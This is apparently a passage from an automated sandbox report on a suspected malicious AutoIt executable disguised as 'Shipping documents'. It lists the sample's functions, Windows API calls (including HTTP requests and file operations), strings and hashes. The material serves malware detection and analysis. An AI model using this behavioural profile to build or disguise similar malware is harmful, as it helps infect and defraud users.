                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                          • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                          • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                          • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                          Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClearVariant
                                                                                                          • String ID:
                                                                                                          • API String ID: 1473721057-0
                                                                                                          • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                          • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                          • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                          • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                          Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_memcmp
                                                                                                          • String ID: '$\$h
                                                                                                          • API String ID: 2205784470-1303700344
                                                                                                          • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                          • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                          • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                          • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                                          Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                          • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                          • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                          • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                          • __swprintf.LIBCMT ref: 0045EC33
                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                          Strings
                                                                                                          • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                          • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                          • API String ID: 2441338619-1568723262
                                                                                                          • Opcode ID: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                                                                          • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                          • Opcode Fuzzy Hash: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                                                                          • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                          Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                          • String ID: @COM_EVENTOBJ
                                                                                                          • API String ID: 327565842-2228938565
                                                                                                          • Opcode ID: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
                                                                                                          • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                          • Opcode Fuzzy Hash: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
                                                                                                          • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                          Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                          • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                          • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                          • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                            • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                            • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                          • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                          • String ID: H
                                                                                                          • API String ID: 3613100350-2852464175
                                                                                                          • Opcode ID: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                                                                          • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                          • Opcode Fuzzy Hash: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                                                                          • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                          Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1291720006-3916222277
                                                                                                          • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                          • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                          • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                          • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                          Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                          • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                          • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                          • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                          • String ID: 0$2
                                                                                                          • API String ID: 93392585-3793063076
                                                                                                          • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                          • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                          • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                          • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                          Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                          • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                          • String ID: crts
                                                                                                          • API String ID: 586820018-3724388283
                                                                                                          • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                          • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                          • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                          • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                          Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Shipping documents..exe,0040F545,C:\Users\user\Desktop\Shipping documents..exe,004A90E8,C:\Users\user\Desktop\Shipping documents..exe,?,0040F545), ref: 0041013C
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                          • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                          • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                          • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                          • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 2326526234-1173974218
                                                                                                          • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                          • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                          • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                          • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                          Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                          • _wcslen.LIBCMT ref: 004335F2
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                          • GetLastError.KERNEL32 ref: 0043362B
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                          • _wcsrchr.LIBCMT ref: 00433666
                                                                                                            • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                          • String ID: \
                                                                                                          • API String ID: 321622961-2967466578
                                                                                                          • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                                                          • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                          • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                                                          • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                          Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsnicmp
                                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                          • API String ID: 1038674560-2734436370
                                                                                                          • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                                                          • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                          • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                                                          • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                          Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                          • __lock.LIBCMT ref: 00417981
                                                                                                            • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                            • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                            • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                          • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                          • __lock.LIBCMT ref: 004179A2
                                                                                                          • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                          • String ID: KERNEL32.DLL$pI
                                                                                                          • API String ID: 637971194-197072765
                                                                                                          • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                          • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                          • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
